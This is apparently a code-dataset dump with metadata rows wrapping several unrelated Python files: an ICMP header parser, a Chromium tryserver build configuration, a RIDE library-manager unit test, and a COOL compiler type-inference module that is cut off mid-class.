main() | 34.412121 | 123 | 0.547376 | 656 | 5,678 | 4.570122 | 0.26372 | 0.040027 | 0.024016 | 0.021348 | 0.148766 | 0.102735 | 0.094063 | 0.074716 | 0.049366 | 0.026684 | 0 | 0.018235 | 0.333568 | 5,678 | 165 | 124 | 34.412121 | 0.774049 | 0.076435 | 0 | 0.097744 | 0 | 0.015038 | 0.125359 | 0.010909 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.030075 | 0.06015 | 0 | 0.120301 | 0.037594 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8a43059e13c59bbffb4972a5168e6bb7887635b | 249 | py | Python | bhp3_class/areas_for_class/packets/struct_icmp.py | JoeZajac/bhp3_class | 650d9741968d031e70cd7277c86aae1fc68202c9 | [
"MIT"
] | 13 | 2018-08-02T22:05:08.000Z | 2022-03-16T17:18:31.000Z | bhp3_class/areas_for_class/packets/struct_icmp.py | JoeZajac/bhp3_class | 650d9741968d031e70cd7277c86aae1fc68202c9 | [
"MIT"
] | null | null | null | bhp3_class/areas_for_class/packets/struct_icmp.py | JoeZajac/bhp3_class | 650d9741968d031e70cd7277c86aae1fc68202c9 | [
"MIT"
] | 7 | 2018-07-12T16:35:21.000Z | 2020-08-28T22:41:45.000Z | import struct
class ICMP:
def __init__(self, buff):
header = struct.unpack('<BBHHH', buff)
self.type = header[0]
self.code = header[1]
self.sum = header[2]
self.id = header[3]
self.seq = header[4] | 24.9 | 46 | 0.554217 | 33 | 249 | 4.060606 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02924 | 0.313253 | 249 | 10 | 47 | 24.9 | 0.754386 | 0 | 0 | 0 | 0 | 0 | 0.024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8adeebf1112413f0695b485db5e984fcb957d81 | 7,022 | py | Python | scripts/master/master_config_tryserver.py | bopopescu/build | 4e95fd33456e552bfaf7d94f7d04b19273d1c534 | [
"BSD-3-Clause"
] | null | null | null | scripts/master/master_config_tryserver.py | bopopescu/build | 4e95fd33456e552bfaf7d94f7d04b19273d1c534 | [
"BSD-3-Clause"
] | null | null | null | scripts/master/master_config_tryserver.py | bopopescu/build | 4e95fd33456e552bfaf7d94f7d04b19273d1c534 | [
"BSD-3-Clause"
] | 1 | 2020-07-23T11:05:06.000Z | 2020-07-23T11:05:06.000Z | # Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shared configuration for the tryserver masters."""
# These modules come from scripts, which must be in the PYTHONPATH.
from master.factory import annotator_factory
from master.factory import chromium_factory
## BUILDER FACTORIES
m_chromium_win = chromium_factory.ChromiumFactory(
'src/build',
target_platform='win32')
m_chromium_win_ninja = chromium_factory.ChromiumFactory(
'src/out',
target_platform='win32')
m_chromium_linux = chromium_factory.ChromiumFactory(
'src/out',
target_platform='linux2')
m_chromium_linux_nohooks = chromium_factory.ChromiumFactory(
'src/out',
nohooks_on_update=True,
target_platform='linux2')
m_chromium_mac = chromium_factory.ChromiumFactory(
'src/xcodebuild',
target_platform='darwin')
m_chromium_mac_ninja = chromium_factory.ChromiumFactory(
'src/out',
target_platform='darwin')
# Chromium for ChromiumOS
m_chromium_chromiumos = chromium_factory.ChromiumFactory(
'src/out',
target_platform='linux2')
m_chromium_android = chromium_factory.ChromiumFactory(
'',
target_platform='linux2',
nohooks_on_update=True,
target_os='android')
# Tests that are single-machine shard-safe.
sharded_tests = [
'accessibility_unittests',
'aura_unittests',
'base_unittests',
'browser_tests',
'buildrunner_tests',
'cacheinvalidation_unittests',
'cast_unittests',
'cc_unittests',
'chromedriver_tests',
'chromedriver_unittests',
'components_unittests',
'content_browsertests',
'content_unittests',
'crypto_unittests',
'device_unittests',
'events_unittests',
'gcm_unit_tests',
'google_apis_unittests',
'gpu_unittests',
'jingle_unittests',
'media_unittests',
'nacl_loader_unittests',
'net_unittests',
'ppapi_unittests',
'printing_unittests',
'remoting_unittests',
'sync_integration_tests',
'sync_unit_tests',
'ui_base_unittests',
'ui_touch_selection_unittests',
'unit_tests',
'views_unittests',
]
# http://crbug.com/157234
win_sharded_tests = sharded_tests[:]
win_sharded_tests.remove('sync_integration_tests')
def CreateBuilder(platform, builder_name, target,
options, tests,
slavebuilddir=None,
factory_properties=None,
annotation_script=None,
ninja=True,
goma=False,
clang=False,
clobber=False,
run_default_swarm_tests=None,
maxTime=8*60*60,
slave_type='Trybot',
build_url=None):
"""Generates and register a builder along with its slave(s)."""
if platform not in ('win32', 'win64', 'linux', 'mac', 'android'):
raise Exception(platform + ' is not a known os type')
assert tests is not None or annotation_script, (
'Must either specify tests or use an annotation script')
factory_properties = (factory_properties or {}).copy()
run_default_swarm_tests = run_default_swarm_tests or []
factory_properties.setdefault('non_default', [
'check_licenses',
'chromedriver_tests',
'courgette_unittests',
'sync_integration_tests',
'url_unittests',
])
factory_properties.setdefault('gclient_env', {})
factory_properties['gclient_env'].setdefault('GYP_DEFINES', '')
factory_properties['gclient_env']['GYP_DEFINES'] += ' dcheck_always_on=1'
if not 'fastbuild=0' in factory_properties['gclient_env']['GYP_DEFINES']:
factory_properties['gclient_env']['GYP_DEFINES'] += ' fastbuild=1'
if platform in ('win32', 'win64'):
# http://crbug.com/157234
factory_properties.setdefault('sharded_tests', win_sharded_tests)
else:
factory_properties.setdefault('sharded_tests', sharded_tests)
build_tool = []
if platform in ('win32', 'win64'):
factory_properties['process_dumps'] = True
factory_properties['start_crash_handler'] = True
if ninja:
factory = m_chromium_win_ninja
factory_properties['gclient_env']['GYP_DEFINES'] += ' chromium_win_pch=0'
else:
factory = m_chromium_win
elif platform == 'linux' and slave_type == 'TrybotTester':
factory = m_chromium_linux_nohooks
elif platform == 'linux':
factory = m_chromium_linux
elif platform == 'android':
factory = m_chromium_android
elif platform == 'mac':
if ninja:
factory = m_chromium_mac_ninja
else:
factory = m_chromium_mac
if ninja:
factory_properties['gclient_env']['GYP_GENERATORS'] = 'ninja'
build_tool.append('--build-tool=ninja')
if goma:
if clang:
build_tool.append('--compiler=goma-clang')
else:
build_tool.append('--compiler=goma')
if clang:
factory_properties['gclient_env']['GYP_DEFINES'] += ' clang=1'
options = build_tool + ['--clobber-post-fail'] + (options or [])
compile_timeout = 3600
if annotation_script:
# Note new slave type AnnotatedTrybot; we don't want a compile step added
# in gclient_factory.py.
# TODO(maruel): Support enable_swarm_tests
builder_factory = factory.ChromiumAnnotationFactory(
slave_type='AnnotatedTrybot', target=target, tests=tests,
clobber=clobber,
options=options,
compile_timeout=compile_timeout,
factory_properties=factory_properties,
annotation_script=annotation_script, maxTime=maxTime)
else:
builder_factory = factory.ChromiumFactory(
slave_type=slave_type, target=target, tests=tests, options=options,
clobber=clobber,
compile_timeout=compile_timeout,
factory_properties=factory_properties,
# Swarming tests are only available to recipes.
# run_default_swarm_tests=run_default_swarm_tests,
build_url=build_url)
builder_info = {
'name': builder_name,
'factory': builder_factory,
}
if slavebuilddir:
builder_info['slavebuilddir'] = slavebuilddir
return builder_info
def prepend_type(prefix, test_list):
"""Prepend a prefix to a test name unless it's a special target.
This is used to mark valgrind tests, such as valgrind_ash_unittests.
"""
br_test = 'buildrunner_tests'
return (
['%s_%s' % (prefix, value) for value in test_list if value != br_test] +
filter(br_test.__eq__, test_list)) # Add back in buildrunner_tests.
def valgrind_tests(test_list):
return prepend_type('valgrind', test_list)
def without_tests(tests, without):
"""Exclude tests from a list."""
return [t for t in tests if t not in without]
# 32 bits tools can't link libwebcore.a anymore due to lack of virtual address
# space, including OSX 10.5.
valgrind_gyp_defines = (
chromium_factory.ChromiumFactory.MEMORY_TOOLS_GYP_DEFINES + ' enable_svg=0')
# drmemory_gyp_defines = 'build_for_tool=drmemory'
nacl_sdk_script = 'nacl_sdk_buildbot_run.py'
nacl_sdk_script_build = 'src/native_client_sdk/src/build_tools/buildbot_run.py'
| 31.630631 | 80 | 0.708488 | 844 | 7,022 | 5.593602 | 0.300948 | 0.072019 | 0.057191 | 0.04893 | 0.231731 | 0.143825 | 0.113959 | 0.113959 | 0.027537 | 0.027537 | 0 | 0.009811 | 0.187126 | 7,022 | 221 | 81 | 31.773756 | 0.817274 | 0.147821 | 0 | 0.215569 | 0 | 0 | 0.247643 | 0.051515 | 0 | 0 | 0 | 0.004525 | 0.005988 | 1 | 0.023952 | false | 0 | 0.011976 | 0.005988 | 0.05988 | 0.005988 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b06edd0eaef753804f71c3493a4ebd638a9a7a | 2,871 | py | Python | utest/spec/test_librarymanager.py | ludovicurbain/SWIFT-RIDE | ab72df08a57101c433bfa5ad44949d9983e4e611 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | utest/spec/test_librarymanager.py | ludovicurbain/SWIFT-RIDE | ab72df08a57101c433bfa5ad44949d9983e4e611 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-07-16T19:27:56.000Z | 2019-07-16T19:27:56.000Z | utest/spec/test_librarymanager.py | ludovicurbain/SWIFT-RIDE | ab72df08a57101c433bfa5ad44949d9983e4e611 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import sys
from robotide.spec.libraryfetcher import get_import_result
from robotide.spec.librarymanager import LibraryManager
from resources import DATAPATH
sys.path.append(os.path.join(DATAPATH, 'libs'))
class TestLibraryManager(unittest.TestCase):
def setUp(self):
self._keywords = None
self._library_manager = LibraryManager(':memory:')
self._library_manager._initiate_database_connection()
self._library_manager._database.create_database()
def tearDown(self):
self._library_manager._database.close()
def test_database_update(self):
self._library_manager.fetch_keywords('BuiltIn', '', self._callback)
keywords = get_import_result('BuiltIn', '')
self._library_manager._handle_message()
self.assertFalse(self._library_manager._keywords_differ(keywords, self._keywords))
def test_manager_handles_callback_exception(self):
self._library_manager.fetch_keywords('Collections', '', (lambda *_: 1/0))
self._library_manager._handle_message()
self._library_manager.fetch_keywords('BuiltIn', '', self._callback)
self._library_manager._handle_message()
self.assertTrue(self._keywords is not None)
def test_fetching_unknown_library(self):
self._library_manager.fetch_keywords('FooBarZoo', '', self._callback)
self._library_manager._handle_message()
self.assertEqual(self._keywords, [])
def test_fetching_from_library_xml(self):
self._library_manager.fetch_keywords('LibSpecLibrary', '', self._callback)
self._library_manager._handle_message()
self.assertEqual(len(self._keywords), 3)
def test_manager_handler_library_that_throws_timeout_exception(self):
import sys
from os import path # DEBUG import non module
sys.path.append(path.dirname(path.abspath(__file__)))
import Exceptional as e
self._library_manager.fetch_keywords(e.__file__, '', self._callback)
self._library_manager._handle_message()
self.assertEqual(self._keywords, [])
def _callback(self, keywords):
self._keywords = keywords
if __name__ == '__main__':
unittest.main()
| 39.328767 | 90 | 0.730059 | 348 | 2,871 | 5.695402 | 0.399425 | 0.094349 | 0.15439 | 0.069627 | 0.274975 | 0.259334 | 0.171039 | 0.171039 | 0.102926 | 0.073663 | 0 | 0.008051 | 0.177987 | 2,871 | 72 | 91 | 39.875 | 0.83178 | 0.221874 | 0 | 0.26087 | 0 | 0 | 0.03383 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 1 | 0.173913 | false | 0 | 0.217391 | 0 | 0.413043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b11385062c7ce4118bb8a9dfbf56f66d92d06f | 29,327 | py | Python | src/cool/semantics/type_inference.py | StrangerBugs/cool-compiler-2021 | 0499de5d27972f90dec49e1fa79ebe1b51a914b9 | [
"MIT"
] | 1 | 2021-02-24T22:40:50.000Z | 2021-02-24T22:40:50.000Z | src/cool/semantics/type_inference.py | StrangerBugs/cool-compiler-2021 | 0499de5d27972f90dec49e1fa79ebe1b51a914b9 | [
"MIT"
] | null | null | null | src/cool/semantics/type_inference.py | StrangerBugs/cool-compiler-2021 | 0499de5d27972f90dec49e1fa79ebe1b51a914b9 | [
"MIT"
] | null | null | null | """The type inference algorithm consist in a dependency di-graph with special nodes to handle the behavior of the
updates of components in the code and solve it in the `context`. For that we crate an structure called
DependencyGraph where we can create nodes as an structure called DependencyNode and arcs between them, an arc e =
<x,y> where x and y are dependency nodes means that the type of node y is inferred by the type of node x,
so for solve the type of y we need first to infer the type of x. For this operation we need some basic nodes that
only contains the type of the node called AtomNode and in the digraph formation an AtomNode is never inferred from
another node. The DependencyGraph consist in a dictionary[node, adjacency list] this adjacency has a declaration
order and this is fundamental for the inference solution algorithm. If we have a case {x : [y, z]} where x, y,
z are nodes then the algorithm will determinate the type of y and all it dependencies before to start with z (a
simple DFS). The order in the adjacency list is the same appearance order in the program. At the end of the algorithm
all nodes that cannot solve it type will be tagged as `Object`.
DependencyNode hierarchy
AtomNode
- type : Node type
VariableInfoNode
- type: Node type
- variable_type : Reference to the variable info of the scope
AttributeNode
- type : Node type
- attribute : Reference to the attribute of the class
ParameterNode
- type : Node type
- method : Reference to the method of the class
- index : Index of the parameter of the method
ReturnTypeNode
- type : Node type
- method : Reference to the method of the class
All nodes has an implementation of the method update that handle how to update the type by it's dependencies
"""
from abc import ABC
from collections import OrderedDict, deque
from typing import Dict, List, Optional, Set, Tuple, Deque
import cool.semantics.utils.astnodes as ast
import cool.semantics.utils.errors as err
import cool.visitor as visitor
from cool.semantics.utils.scope import (
Attribute,
Context,
ErrorType,
Method,
Scope,
SemanticError,
Type,
VariableInfo,
)
class DependencyNode:
type: Type
def update(self, _type: Type) -> None:
raise NotImplementedError()
def __repr__(self):
return str(self)
@property
def is_ready(self):
return True
class AtomNode(DependencyNode):
def __init__(self, atom_type: Type):
self.type: Type = atom_type
def update(self, _type: Type) -> None:
pass
def __str__(self):
return f"Atom({self.type.name})"
class VariableInfoNode(DependencyNode):
def __init__(self, var_type: Type, variable_info: VariableInfo):
self.type: Type = var_type
self.variable_info: VariableInfo = variable_info
def update(self, _type):
self.type = self.variable_info.type = _type
def __str__(self):
return f"VarInfo({self.variable_info.name}, {self.type.name})"
class AttributeNode(DependencyNode):
def __init__(self, attr_type: Type, attribute: Attribute):
self.type: Type = attr_type
self.attribute: Attribute = attribute
def update(self, _type: Type) -> None:
self.type = self.attribute.type = _type
def __str__(self):
return f"Attr({self.attribute.name}, {self.type.name})"
class ParameterNode(DependencyNode):
def __init__(self, param_type: Type, method: Method, index: int):
self.type: Type = param_type
self.method: Method = method
self.index: int = index
def update(self, _type):
self.type = self.method.param_types[self.index] = _type
def __str__(self):
return f"Param({self.method.name}, {self.index}, {self.type.name})"
class ReturnTypeNode(DependencyNode):
def __init__(self, ret_type: Type, method: Method):
self.type: Type = ret_type
self.method: Method = method
def update(self, _type):
self.type = self.method.return_type = _type
def __str__(self):
return f"Return({self.method.name}, {self.type.name})"
class BranchedNode(DependencyNode, ABC):
branches: List[DependencyNode] = []
@property
def is_ready(self) -> bool:
return all(x.type.name != "AUTO_TYPE" for x in self.branches)
class ConditionalNode(BranchedNode):
def __init__(self, conditional_type, then_branch, else_branch):
self.type = conditional_type
self.branches = [then_branch, else_branch]
def update(self, _type: Type) -> None:
self.type = _type
def __str__(self):
return f"ConditionalNode({self.type.name})"
class CaseOfNode(BranchedNode):
def __init__(self, _type, branches):
self.type = _type
self.branches = branches
def update(self, _type: Type) -> None:
self.type = _type
def __str__(self):
return f"CaseOfNode({self.type.name})"
class DependencyGraph:
def __init__(self):
self.dependencies: Dict[DependencyNode, List[DependencyNode]] = OrderedDict()
def add_node(self, node: DependencyNode):
if node not in self.dependencies:
self.dependencies[node] = []
def add_edge(self, node: DependencyNode, other: DependencyNode):
try:
self.dependencies[node].append(other)
except KeyError:
self.dependencies[node] = [other]
self.add_node(other)
def update_dependencies(self, default_type: Type = None):
queue: Deque[DependencyNode] = deque(
node for node in self.dependencies if isinstance(node, AtomNode)
)
visited: Set[DependencyNode] = set(queue)
while queue:
node = queue.popleft()
if not node.is_ready:
continue
for adj in self.dependencies[node]:
if adj not in visited:
adj.update(node.type)
visited.add(adj)
if not isinstance(adj, BranchedNode):
queue.append(adj)
for node in self.dependencies:
if isinstance(node, BranchedNode) and node.is_ready:
node.update(Type.multi_join([x.type for x in node.branches]))
queue = deque(
node
for node in self.dependencies
if isinstance(node, BranchedNode) and node.type.name != "AUTO_TYPE"
)
visited.update(queue)
while queue:
node = queue.popleft()
for adj in self.dependencies[node]:
if adj not in visited:
adj.update(node.type)
visited.add(adj)
queue.append(adj)
if default_type is not None:
for node in self.dependencies:
if node not in visited:
node.update(default_type)
def __str__(self):
return (
"{\n\t"
+ "\n\t".join(f"{key}: {value}" for key, value in self.dependencies.items())
+ "\n}"
)
class InferenceChecker:
def __init__(self, context, errors):
self.context: Context = context
self.errors: List[str] = errors
self.current_type: Optional[Type] = None
self.current_method: Optional[Method] = None
self.variables: Dict[VariableInfo, VariableInfoNode] = {}
self.attributes = self.build_attributes_reference(context)
self.methods = self.build_methods_reference(context)
self.graph = DependencyGraph()
@staticmethod
def build_attributes_reference(
context: Context,
) -> Dict[Tuple[str, str], AttributeNode]:
attributes = {}
for typex in context:
for attr in typex.attributes:
attributes[typex.name, attr.name] = AttributeNode(attr.type, attr)
return attributes
@staticmethod
def build_methods_reference(
context: Context,
) -> Dict[Tuple[str, str], Tuple[List[ParameterNode], ReturnTypeNode]]:
methods = {}
for typex in context:
for method in typex.methods:
methods[typex.name, method.name] = (
[
ParameterNode(t, method, i)
for i, t in enumerate(method.param_types)
],
ReturnTypeNode(method.return_type, method),
)
return methods
@visitor.on("node")
def visit(self, node, scope):
pass
@visitor.when(ast.ProgramNode)
def visit(self, node: ast.ProgramNode, scope: Scope = None):
if scope is None:
scope = Scope()
for item in node.declarations:
self.visit(item, scope.create_child())
# print(self.graph, '\n')
self.graph.update_dependencies(default_type=self.context.get_type("Object"))
# print(self.graph, '\n')
InferenceTypeSubstitute(self.context, self.errors).visit(node, scope)
@visitor.when(ast.ClassDeclarationNode)
def visit(self, node: ast.ClassDeclarationNode, scope: Scope):
self.current_type = self.context.get_type(node.id)
attrs = [
feature
for feature in node.features
if isinstance(feature, ast.AttrDeclarationNode)
]
methods = [
feature
for feature in node.features
if isinstance(feature, ast.MethodDeclarationNode)
]
for attr in attrs:
self.visit(attr, scope)
for method in methods:
self.visit(method, scope.create_child())
@visitor.when(ast.AttrDeclarationNode)
def visit(self, node: ast.AttrDeclarationNode, scope: Scope):
# Solve the expression of the attribute
expr_node = (
self.visit(node.expr, scope.create_child())
if node.expr is not None
else None
)
# Define attribute in the scope
var_info = scope.define_variable(node.id, self.context.get_type(node.type))
# Set and get the reference to the variable info node
var_info_node = self.variables[var_info] = VariableInfoNode(
self.context.get_type(node.type), var_info
)
if node.type == "AUTO_TYPE":
# Get the reference to the attribute node
attr_node = self.attributes[self.current_type.name, node.id]
# If the expression node is not None then two edges are creates in the graph
if expr_node is not None:
self.graph.add_edge(expr_node, var_info_node)
self.graph.add_edge(expr_node, attr_node)
# Finally a cycle of two nodes is created between var_info_node and attr_node
self.graph.add_edge(var_info_node, attr_node)
self.graph.add_edge(attr_node, var_info_node)
@visitor.when(ast.MethodDeclarationNode)
def visit(self, node: ast.MethodDeclarationNode, scope: Scope):
self.current_method = self.current_type.get_method(node.id)
# Define 'self' as a variable in the scope
self_var = scope.define_variable("self", self.current_type)
# Set the reference of 'self' variable info node
self.variables[self_var] = VariableInfoNode(self.current_type, self_var)
param_names = self.current_method.param_names
param_types = self.current_method.param_types
for i, (param_name, param_type) in enumerate(zip(param_names, param_types)):
# Define parameter as local variable in current scope
param_var_info = scope.define_variable(param_name, param_type)
# Set the reference to the variable info node
param_var_info_node = self.variables[param_var_info] = VariableInfoNode(
param_type, param_var_info
)
if param_type.name == "AUTO_TYPE":
# Get the parameter node
parameter_node = self.methods[
self.current_type.name, self.current_method.name
][0][i]
# Create the cycle of two nodes between param_var_info_node and parameter_node
self.graph.add_edge(param_var_info_node, parameter_node)
self.graph.add_edge(parameter_node, param_var_info_node)
# Solve the body of the method
body_node = self.visit(node.body, scope)
if self.current_method.return_type.name == "AUTO_TYPE":
# Get the return type node and add an edge body_node -> return_type_node
return_type_node = self.methods[
self.current_type.name, self.current_method.name
][1]
self.graph.add_edge(body_node, return_type_node)
@visitor.when(ast.LetNode)
def visit(self, node: ast.LetNode, scope: Scope):
for _id, _type, _expr in node.declarations:
try:
# Define and get the var_info
var_info = scope.define_variable(_id, self.context.get_type(_type))
except SemanticError:
var_info = scope.define_variable(_id, ErrorType())
var_info_node = self.variables[var_info] = VariableInfoNode(
var_info.type, var_info
)
expr_node = (
self.visit(_expr, scope.create_child()) if _expr is not None else None
)
if var_info.type.name == "AUTO_TYPE":
# Create an edge or add an new node only if it is AutoType
if expr_node is not None:
self.graph.add_edge(expr_node, var_info_node)
if expr_node.type.name == "AUTO_TYPE":
self.graph.add_edge(var_info_node, expr_node)
else:
self.graph.add_node(var_info_node)
elif expr_node is not None and expr_node.type.name == "AUTO_TYPE":
self.graph.add_edge(var_info_node, expr_node)
return self.visit(node.expr, scope.create_child())
@visitor.when(ast.AssignNode)
def visit(self, node: ast.AssignNode, scope: Scope):
var_info = scope.find_variable(node.id)
expr_node = self.visit(node.expr, scope.create_child())
if var_info is not None:
if expr_node.type.name != "AUTO_TYPE" and var_info.type.name == "AUTO_TYPE":
self.graph.add_edge(expr_node, self.variables[var_info])
elif (
var_info.type.name != "AUTO_TYPE" and expr_node.type.name == "AUTO_TYPE"
):
self.graph.add_edge(
AtomNode(self.context.get_type(var_info.type.name)), expr_node
)
elif (
var_info.type.name == "AUTO_TYPE" and expr_node.type.name == "AUTO_TYPE"
):
# Create a cycle
self.graph.add_edge(expr_node, self.variables[var_info])
self.graph.add_edge(self.variables[var_info], expr_node)
else:
pass
return expr_node
@visitor.when(ast.BlockNode)
def visit(self, node: ast.BlockNode, scope: Scope):
child_scope = scope.create_child()
result_node = None
for expr in node.expressions:
result_node = self.visit(expr, child_scope)
return result_node
@visitor.when(ast.ConditionalNode)
def visit(self, node: ast.ConditionalNode, scope: Scope):
if_node = self.visit(node.if_expr, scope)
if not isinstance(if_node, AtomNode):
self.graph.add_edge(AtomNode(self.context.get_type("Bool")), if_node)
then_node = self.visit(node.then_expr, scope.create_child())
else_node = self.visit(node.else_expr, scope.create_child())
if isinstance(then_node, AtomNode) and isinstance(else_node, AtomNode):
return AtomNode(then_node.type.join(else_node.type))
conditional_node = ConditionalNode(
self.context.get_type("AUTO_TYPE"), then_node, else_node
)
if isinstance(then_node, AtomNode) and not isinstance(else_node, AtomNode):
self.graph.add_edge(then_node, else_node)
elif not isinstance(then_node, AtomNode) and isinstance(else_node, AtomNode):
self.graph.add_edge(else_node, then_node)
else:
self.graph.add_edge(then_node, else_node)
self.graph.add_edge(else_node, then_node)
self.graph.add_edge(conditional_node, then_node)
self.graph.add_edge(conditional_node, else_node)
return conditional_node
@visitor.when(ast.WhileNode)
def visit(self, node: ast.WhileNode, scope: Scope):
self.visit(node.condition, scope)
self.visit(node.body, scope.create_child())
return AtomNode(self.context.get_type("Object"))
@visitor.when(ast.SwitchCaseNode)
def visit(self, node: ast.SwitchCaseNode, scope: Scope):
self.visit(node.expr, scope)
defined_nodes = []
not_defined_nodes = []
case_nodes = []
for _id, _type, _expr in node.cases:
new_scope = scope.create_child()
var_info = new_scope.define_variable(_id, self.context.get_type(_type))
self.variables[var_info] = VariableInfoNode(var_info.type, var_info)
case_node = self.visit(_expr, new_scope)
if isinstance(case_node, AtomNode):
defined_nodes.append(case_node)
else:
not_defined_nodes.append(case_node)
case_nodes.append(case_node)
if any(e.type.name == "AUTO_TYPE" for e in case_nodes):
if defined_nodes:
t = Type.multi_join([x.type for x in defined_nodes])
for x in not_defined_nodes:
self.graph.add_edge(AtomNode(t), x)
case_of_node = CaseOfNode(self.context.get_type("AUTO_TYPE"), case_nodes)
self.graph.add_node(case_of_node)
return case_of_node
return AtomNode(Type.multi_join([e.type for e in case_nodes]))
@visitor.when(ast.MethodCallNode)
def visit(self, node: ast.MethodCallNode, scope: Scope):
if node.obj is None:
node.obj = ast.VariableNode("self")
obj_node = self.visit(node.obj, scope)
if isinstance(obj_node, AtomNode) and obj_node.type.contains_method(node.id):
method, owner = obj_node.type.get_method(node.id, get_owner=True)
param_nodes, return_node = self.methods[owner.name, method.name]
for i, arg in enumerate(node.args):
arg_node = self.visit(arg, scope)
if arg_node is None:
# Possible error
continue
if isinstance(arg_node, AtomNode):
if param_nodes[i].type.name == "AUTO_TYPE":
self.graph.add_edge(arg_node, param_nodes[i])
else:
continue
else:
if param_nodes[i].type.name != "AUTO_TYPE":
self.graph.add_edge(param_nodes[i], arg_node)
else:
self.graph.add_edge(param_nodes[i], arg_node)
self.graph.add_edge(arg_node, param_nodes[i])
if return_node.type.name == "AUTO_TYPE":
return return_node
return AtomNode(
return_node.type
if return_node.type.name != "SELF_TYPE"
else obj_node.type
)
for arg in node.args:
self.visit(arg, scope)
return AtomNode(self.context.get_type("Object"))
@visitor.when(ast.IntegerNode)
def visit(self, node: ast.IntegerNode, scope: Scope):
return AtomNode(self.context.get_type("Int"))
@visitor.when(ast.StringNode)
def visit(self, node: ast.StringNode, scope: Scope):
return AtomNode(self.context.get_type("String"))
@visitor.when(ast.BooleanNode)
def visit(self, node: ast.BooleanNode, scope: Scope):
return AtomNode(self.context.get_type("Bool"))
@visitor.when(ast.VariableNode)
def visit(self, node: ast.VariableNode, scope: Scope):
var_info = scope.find_variable(node.lex)
if var_info is not None:
if var_info.type.name == "AUTO_TYPE":
return self.variables[var_info]
else:
return AtomNode(var_info.type)
else:
return None
@visitor.when(ast.InstantiateNode)
def visit(self, node: ast.InstantiateNode, scope: Scope):
if node.lex in self.context.types:
return AtomNode(self.context.get_type(node.lex))
return AtomNode(self.context.get_type("Object"))
@visitor.when(ast.NegationNode)
def visit(self, node: ast.NegationNode, scope: Scope):
self.visit(node.expr, scope)
return AtomNode(self.context.get_type("Bool"))
@visitor.when(ast.ComplementNode)
def visit(self, node: ast.ComplementNode, scope: Scope):
self.visit(node.expr, scope)
return AtomNode(self.context.get_type("Int"))
@visitor.when(ast.IsVoidNode)
def visit(self, node: ast.IsVoidNode, scope: Scope):
self.visit(node.expr, scope)
return AtomNode(self.context.get_type("Bool"))
@visitor.when(ast.PlusNode)
def visit(self, node: ast.PlusNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.MinusNode)
def visit(self, node: ast.MinusNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.StarNode)
def visit(self, node: ast.StarNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.DivNode)
def visit(self, node: ast.DivNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Int")
)
@visitor.when(ast.LessEqualNode)
def visit(self, node: ast.LessEqualNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Bool")
)
@visitor.when(ast.LessThanNode)
def visit(self, node: ast.LessThanNode, scope: Scope):
return self._visit_arithmetic_node(
node, scope, self.context.get_type("Int"), self.context.get_type("Bool")
)
@visitor.when(ast.EqualNode)
def visit(self, node: ast.EqualNode, scope: Scope):
self.visit(node.left, scope)
self.visit(node.right, scope)
return AtomNode(self.context.get_type("Bool"))
def _visit_arithmetic_node(
self, node: ast.BinaryNode, scope: Scope, member_types: Type, return_type: Type
):
left = self.visit(node.left, scope)
right = self.visit(node.right, scope)
if not isinstance(left, AtomNode):
self.graph.add_edge(AtomNode(member_types), left)
if not isinstance(right, AtomNode):
self.graph.add_edge(AtomNode(member_types), right)
return AtomNode(return_type)
class InferenceTypeSubstitute:
def __init__(self, context: Context, errors: List[str]):
self.context: Context = context
self.errors: List[str] = errors
self.current_type: Optional[Type] = None
self.current_method: Optional[Method] = None
@visitor.on("node")
def visit(self, node, tabs):
pass
@visitor.when(ast.ProgramNode)
